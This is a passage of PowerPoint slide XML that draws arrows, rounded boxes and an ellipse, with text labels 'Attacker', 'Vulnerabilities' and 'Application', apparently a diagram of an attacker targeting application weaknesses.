                    <a:pt x="1170592" y="44911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163559" y="26386"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1238884" h="487679">
                  <a:moveTo>
                    <a:pt x="1226094" y="21844"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1175511" y="21844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1182496" y="40386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170592" y="44911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180591" y="71247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226094" y="21844"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1238884" h="487679">
                  <a:moveTo>
                    <a:pt x="1175511" y="21844"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1163559" y="26386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170592" y="44911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1182496" y="40386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1175511" y="21844"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1238884" h="487679">
                  <a:moveTo>
                    <a:pt x="1153540" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1163559" y="26386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1175511" y="21844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226094" y="21844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238376" y="8509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115354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951982" y="3204210"/>
              <a:ext cx="1431290" cy="655320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1431290" h="655320">
                  <a:moveTo>
                    <a:pt x="0" y="327660"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11526" y="268759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44758" y="213323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97677" y="162277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130887" y="138690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168262" y="116547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209550" y="95964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254496" y="77057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302850" y="59941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354358" y="44732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408768" y="31545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465828" y="20497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525286" y="11703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586888" y="5278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650383" y="1338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715518" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780652" y="1338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="844147" y="5278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905749" y="11703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965207" y="20497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022267" y="31545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1076677" y="44732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128185" y="59941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1176539" y="77057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221486" y="95964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1262773" y="116547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1300148" y="138690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1333358" y="162277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386277" y="213323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1419509" y="268759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1431036" y="327660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1428112" y="357485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1405480" y="414769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362152" y="468125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1300148" y="516629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1262773" y="538772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221486" y="559355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1176539" y="578262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128185" y="595378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1076677" y="610587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022267" y="623774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965207" y="634822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905749" y="643616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="844147" y="650041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780652" y="653981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715518" y="655320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650383" y="653981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586888" y="650041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525286" y="643616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465828" y="634822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408768" y="623774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354358" y="610587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302850" y="595378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254496" y="578262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209550" y="559355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168262" y="538772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130887" y="516629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97677" y="493042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44758" y="441996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11526" y="386560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="327660"/>
                  </a:lnTo>
                  <a:close/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325492" y="3397081"/>
            <a:ext cx="682447" cy="228849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13332" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pP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Attacker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623338" y="2212150"/>
            <a:ext cx="1800391" cy="2748199"/>
            <a:chOff x="8625585" y="2211832"/>
            <a:chExt cx="1800860" cy="2748915"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8631935" y="2657856"/>
              <a:ext cx="1788160" cy="1531620"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1788159" h="1531620">
                  <a:moveTo>
                    <a:pt x="0" y="255270"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4113" y="209387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15971" y="166202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34854" y="126435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60040" y="90807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90807" y="60040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126435" y="34854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166202" y="15971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209387" y="4113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255270" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1532382" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578264" y="4113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1621449" y="15971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1661216" y="34854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1696844" y="60040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727611" y="90807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1752797" y="126435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1771680" y="166202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783538" y="209387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1787652" y="255270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1787652" y="1276350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783538" y="1322232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1771680" y="1365417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1752797" y="1405184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727611" y="1440812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1696844" y="1471579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1661216" y="1496765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1621449" y="1515648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578264" y="1527506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1532382" y="1531620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255270" y="1531620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209387" y="1527506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166202" y="1515648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126435" y="1496765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90807" y="1471579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60040" y="1440812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34854" y="1405184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15971" y="1365417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113" y="1322232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1276350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="255270"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12192">
              <a:solidFill>
                <a:srgbClr val="006FC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9108820" y="2211832"/>
              <a:ext cx="76200" cy="816610"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="76200" h="816610">
                  <a:moveTo>
                    <a:pt x="0" y="739140"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35940" y="816356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69796" y="753237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47624" y="753237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27939" y="752602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28305" y="739941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="739140"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="76200" h="816610">
                  <a:moveTo>
                    <a:pt x="28305" y="739941"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="27939" y="752602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47624" y="753237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47994" y="740499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28305" y="739941"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="76200" h="816610">
                  <a:moveTo>
                    <a:pt x="47994" y="740499"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47624" y="753237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69796" y="753237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76199" y="741299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47994" y="740499"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="76200" h="816610">
                  <a:moveTo>
                    <a:pt x="49656" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="28305" y="739941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47994" y="740499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69468" y="507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4965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876537" y="4234433"/>
              <a:ext cx="821690" cy="725805"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="821690" h="725804">
                  <a:moveTo>
                    <a:pt x="63741" y="42928"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="50663" y="57789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808608" y="725805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821689" y="710946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63741" y="42928"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="725804">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32003" y="78994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50663" y="57789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41147" y="49403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54228" y="34544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71119" y="34544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82295" y="21844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="725804">
                  <a:moveTo>
                    <a:pt x="54228" y="34544"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="41147" y="49403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50663" y="57789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63741" y="42928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54228" y="34544"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="725804">
                  <a:moveTo>
                    <a:pt x="71119" y="34544"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54228" y="34544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63741" y="42928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71119" y="3454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73895" y="3022092"/>
              <a:ext cx="138684" cy="1752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3851" y="2900172"/>
              <a:ext cx="140208" cy="1752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65919" y="3642360"/>
              <a:ext cx="140208" cy="17678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58985" y="2231517"/>
              <a:ext cx="395605" cy="675005"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="395604" h="675005">
                  <a:moveTo>
                    <a:pt x="348772" y="613521"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="324358" y="627634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395478" y="674497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392411" y="624459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355092" y="624459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348772" y="613521"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="395604" h="675005">
                  <a:moveTo>
                    <a:pt x="365917" y="603611"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="348772" y="613521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355092" y="624459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372237" y="614553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365917" y="603611"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="395604" h="675005">
                  <a:moveTo>
                    <a:pt x="390271" y="589534"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="365917" y="603611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372237" y="614553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355092" y="624459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392411" y="624459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390271" y="589534"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="395604" h="675005">
                  <a:moveTo>
                    <a:pt x="17272" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="9906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348772" y="613521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365917" y="603611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727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598962" y="1853087"/>
            <a:ext cx="1127466" cy="228849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13332" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerabilities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53708" y="3210871"/>
            <a:ext cx="898291" cy="228849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13332" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pP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Application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380079" y="2421771"/>
            <a:ext cx="2883419" cy="2557749"/>
            <a:chOff x="7382002" y="2421508"/>
            <a:chExt cx="2884170" cy="2558415"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8771382" y="2780537"/>
              <a:ext cx="1480185" cy="1287780"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1480184" h="1287779">
                  <a:moveTo>
                    <a:pt x="0" y="214629"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5670" y="165431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21823" y="120261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47166" y="80409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80409" y="47166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120261" y="21823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165431" y="5670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214629" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265174" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1314372" y="5670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1359542" y="21823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1399394" y="47166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1432637" y="80409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1457980" y="120261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1474133" y="165431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479804" y="214629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479804" y="1073149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1474133" y="1122348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1457980" y="1167518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1432637" y="1207370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1399394" y="1240613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1359542" y="1265956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1314372" y="1282109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265174" y="1287779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214629" y="1287779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165431" y="1282109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120261" y="1265956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80409" y="1240613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47166" y="1207370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21823" y="1167518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5670" y="1122348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1073149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="214629"/>
                  </a:lnTo>
                  <a:close/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331581" y="2421508"/>
              <a:ext cx="356870" cy="359410"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="356870" h="359410">
                  <a:moveTo>
                    <a:pt x="296135" y="311954"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="276098" y="331851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356870" y="359029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344309" y="320929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305054" y="320929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296135" y="311954"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="356870" h="359410">
                  <a:moveTo>
                    <a:pt x="310216" y="297972"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="296135" y="311954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305054" y="320929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319151" y="306959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310216" y="297972"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="356870" h="359410">
                  <a:moveTo>
                    <a:pt x="330200" y="278130"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="310216" y="297972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319151" y="306959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305054" y="320929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344309" y="320929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330200" y="278130"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="356870" h="359410">
                  <a:moveTo>
                    <a:pt x="13970" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="13970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296135" y="311954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310216" y="297972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13970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9506204" y="4139945"/>
              <a:ext cx="470534" cy="839469"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="470534" h="839470">
                  <a:moveTo>
                    <a:pt x="470535" y="84201"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="466471" y="57277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457835" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398018" y="60706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424802" y="69392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191363" y="786993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46901" y="122694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74549" y="116713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69329" y="110236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21082" y="50292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="132842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27597" y="126873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179247" y="824230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176276" y="833374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181610" y="835113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182372" y="838581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188328" y="837298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195072" y="839470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196342" y="835558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201676" y="834390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199682" y="825284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443750" y="75526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470535" y="84201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7382129" y="3392297"/>
              <a:ext cx="1250315" cy="149225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1250315" h="149225">
                  <a:moveTo>
                    <a:pt x="1172999" y="28016"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="129159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777" y="148844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1174725" y="47831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1172999" y="28016"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1250315" h="149225">
                  <a:moveTo>
                    <a:pt x="1238577" y="26924"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1185671" y="26924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187449" y="46736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1174725" y="47831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177162" y="75819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249806" y="31369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238577" y="26924"/>
                  </a:lnTo>
